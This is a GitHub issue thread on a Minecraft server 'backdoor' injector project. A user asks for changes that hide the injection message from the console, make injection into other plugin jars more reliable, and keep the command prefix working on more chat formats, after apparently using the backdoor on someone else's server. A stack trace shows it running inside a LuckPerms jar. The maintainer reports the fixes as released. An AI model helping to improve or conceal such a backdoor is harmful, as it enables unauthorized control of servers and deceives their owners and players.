### ISSUE TITLE
Three problems

### ISSUE THREAD

**Issue by DarkReaper231** [ThiccIndustries/Minecraft-Backdoor#69]
First problem - this
```
if(!print_msg)
    System.out.println("[Injector] Injecting backdoor loader into class.");
```
should be this
```
if(print_msg)
    System.out.println("[Injector] Injecting backdoor loader into class.");
```
because else it prints that line into console which makes it obvious

Second problem - it should not inject into non-plugin jars
When the injecting into other plugins is enabled, it injects to whatever jar is in plugins folder. But what if for some random reason the owner accidentally puts fabric mod into the plugins folder. The server won't care but the injector will inject resulting in this error in console
```
java.lang.NullPointerException: Cannot invoke "java.util.Map.get(Object)" because "pluginYAML" is null
	at com.thiccindustries.debugger.Injector.patchFile(Injector.java:83) ~[LuckPerms-Bukkit-5.4.21.jar:?]
	at com.thiccindustries.debugger.Debugger.<init>(Debugger.java:77) ~[LuckPerms-Bukkit-5.4.21.jar:?]
	at me.lucko.luckperms.bukkit.loader.BukkitLoaderPlugin.onEnable(BukkitLoaderPlugin.java:52) ~[LuckPerms-Bukkit-5.4.21.jar:?]
	at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:264) ~[purpur-api-1.18.2-R0.1-SNAPSHOT.jar:?]
	at org.bukkit.plugin.java.JavaPluginLoader.enablePlugin(JavaPluginLoader.java:370) ~[purpur-api-1.18.2-R0.1-SNAPSHOT.jar:?]
	at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:501) ~[purpur-api-1.18.2-R0.1-SNAPSHOT.jar:?]
	at org.bukkit.craftbukkit.v1_18_R2.CraftServer.enablePlugin(CraftServer.java:559) ~[purpur-1.18.2.jar:git-Purpur-1584]
	at org.bukkit.craftbukkit.v1_18_R2.CraftServer.enablePlugins(CraftServer.java:473) ~[purpur-1.18.2.jar:git-Purpur-1584]
	at net.minecraft.server.dedicated.DedicatedServer.initServer(DedicatedServer.java:324) ~[purpur-1.18.2.jar:git-Purpur-1584]
	at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:1181) ~[purpur-1.18.2.jar:git-Purpur-1584]
	at net.minecraft.server.MinecraftServer.lambda$spin$1(MinecraftServer.java:322) ~[purpur-1.18.2.jar:git-Purpur-1584]
	at java.lang.Thread.run(Thread.java:833) ~[?:?]
```
So there should be some check if the plugin contains plugin.yml and if it does not, it should just skip. Because now it will throw npe due to plugin.yml not existing in the jar.

Third problem - prefix does not work on some chat formats
I had no way to dig into this deeper but I tested it on one server and it just didn't catch it so I was just typing the prefix into the entire chat so everybody saw what I was typing. I assume it was because the chat format they used was something like this  `&f%op name`  
So would be nice if the plugin also listened for anything with color codes in front of the command

**Comment by MajesticWaffle** [comment]
Fixed in [release v2.2.4](https://github.com/ThiccIndustries/Minecraft-Backdoor/releases/tag/v2.2.4)
